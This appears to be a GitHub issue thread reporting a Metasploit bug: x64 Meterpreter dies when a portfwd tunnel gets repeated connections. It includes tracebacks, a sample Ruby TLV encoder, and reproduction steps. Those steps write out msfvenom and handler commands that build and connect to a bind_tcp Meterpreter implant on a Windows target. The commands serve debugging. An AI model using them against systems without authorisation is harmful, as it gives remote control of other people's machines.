Open asoto-r7 opened 6 years ago
I recreated this in a fresh environment and it's still happening. I also get a traceback in msfconsole which conveniently duplicates #10160, so we'll ignore that.

Also, I get a traceback after Meterpreter dies, which may be an after-effect and not anything actually helpful. But just in case:
```
msf5 exploit(windows/license/sentinel_lm7_udp) > [*] 192.168.1.11 - Meterpreter session 3 closed. Reason: Died
Interrupt: use the 'exit' command to quit
msf5 exploit(windows/license/sentinel_lm7_udp) > #<Thread:0x00007f7ed0729498@/home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
Traceback (most recent call last):
7: from /home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
6: from /home/administrator/git/r7/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
5: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `block in monitor_rsock'
4: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `loop'
3: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:188:in `block (2 levels) in monitor_rsock'
2: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:90:in `close_write'
1: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:106:in `shutdown'
/home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:177:in `send_request': Operation timed out. (Rex::TimeoutError)
```
TL;DR: This is still an issue.
Run on attacker VM:

```
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=ATTACKER_IP_ADDRESS -f exe -o bind_tcp_192.168.199.134_4444.exe
msfconsole -qx 'handler -p windows/x64/meterpreter/bind_tcp -H TARGET_IP_ADDRESS -P 4444
background
sessions -C 'portfwd add -r 216.146.43.71 -p 80 -l 8000'
```

Launch the bind_tcp payload on a Win10 x64 box.

On another terminal on the attacker box:

```
while true; do curl 127.0.0.1:8000; sleep 1; done
```

Observe the above traceback.
ADDENDUM: In addition to the above traceback (which just kills the remote Meterpreter process and reports a timeout), we have another exception if the address we're trying to connect to doesn't respond:
```
#<Thread:0x00007f1b980b16b0@/home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
Traceback (most recent call last):
17: from /home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
16: from /home/administrator/git/r7/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
15: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `block in monitor_rsock'
14: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `loop'
13: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:188:in `block (2 levels) in monitor_rsock'
12: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:90:in `close_write'
11: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:106:in `shutdown'
10: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:172:in `send_request'
9: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:200:in `send_packet_wait_response'
8: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:133:in `send_packet'
7: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:823:in `to_r'
6: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:823:in `call'
5: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:595:in `to_r'
4: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:453:in `each'
3: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:453:in `each'
2: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:596:in `block in to_r'
1: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `to_r'
/home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `pack': no implicit conversion of nil into Integer (TypeError)
```
In my testing, as little as 5 repeated connections, spaced apart by 5 seconds, caused x64 Meterpreter to crash.
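The `pack` TypeError in the traceback above is what happens when a nil value reaches `Array#pack` while a TLV is being serialised. The following is an added example (mine, not the framework's packet.rb) using a simplified length/type/value TLV layout: it shows the unchecked encoder failing the same way, a hardened version that rejects the nil up front with the TLV type in the message, and a bounds-checked decoder. The constant values and layout are assumptions for illustration only.

```ruby
# Simplified TLV (length, type, value) encoder, not Metasploit's packet.rb.
# Meta-type bits and header layout are assumed here for illustration.
TLV_META_TYPE_STRING = 1 << 16
TLV_META_TYPE_UINT   = 1 << 17
TLV_HEADER_LEN       = 8 # 4-byte length + 4-byte type, both big-endian

class Tlv
  attr_reader :type, :value
  def initialize(type, value)
    @type  = type
    @value = value
  end

  def string?
    (@type & TLV_META_TYPE_STRING) != 0
  end

  # Unchecked encoder: a nil numeric value reaches Array#pack, which raises
  # TypeError ("no implicit conversion of nil into Integer"), the same
  # failure the traceback shows inside to_r during close_write/shutdown.
  def to_r_unchecked
    raw = string? ? "#{@value}\x00".b : [@value].pack('N')
    [raw.bytesize + TLV_HEADER_LEN, @type].pack('NN') + raw
  end

  # Hardened encoder: reject a missing value before packing so the error
  # names the offending TLV type at the call site instead of surfacing as
  # a bare TypeError from a background socket thread.
  def to_r
    raise ArgumentError, "TLV type 0x#{@type.to_s(16)} has nil value" if @value.nil?
    to_r_unchecked
  end
end

# Decode a buffer of concatenated TLVs into [type, value] pairs, checking
# each declared length against the buffer so a truncated TLV is rejected.
def parse_tlvs(buf)
  tlvs = []
  off = 0
  while off + TLV_HEADER_LEN <= buf.bytesize
    len, type = buf.byteslice(off, TLV_HEADER_LEN).unpack('NN')
    raise ArgumentError, "bad TLV length #{len} at offset #{off}" if len < TLV_HEADER_LEN || off + len > buf.bytesize
    raw = buf.byteslice(off + TLV_HEADER_LEN, len - TLV_HEADER_LEN)
    value = (type & TLV_META_TYPE_STRING) != 0 ? raw.chomp("\x00") : raw.unpack1('N')
    tlvs << [type, value]
    off += len
  end
  tlvs
end
```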
It's possible this is related to some Meterpreter issues with `portfwd`, but I have no evidence to support/contradict that theory yet.

Steps to reproduce

1. Drop a `windows/x64/meterpreter/bind_tcp` payload, in my case on a Windows 10 x64 target (fully patched).
2. In `msfconsole`, run `handler -p windows/x64/meterpreter/bind_tcp -H TARGET_IP_ADDRESS -P 4444`
3. Set up a forwarded port, in my case to rapid7.com: `sessions -C 'portfwd add -r 52.85.208.191 -p 80 -l 8000'`
4. In a new terminal, set netcat to slowly simmer: `i=1; while true; do echo -n "ATTEMPT $i: "; nc -zn 127.0.0.1 8000; sleep 5; let i=$i+1; echo; done`
5. Wait for `Meterpreter session 1 closed. Reason: Died`.

Note: Ignore the tracebacks, they're part of the above, cited Meterpreter issue:
Click here for (potentially unrelated) tracebacks

```
/Users/asoto/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `pack': no implicit conversion of nil into Integer (TypeError) #
```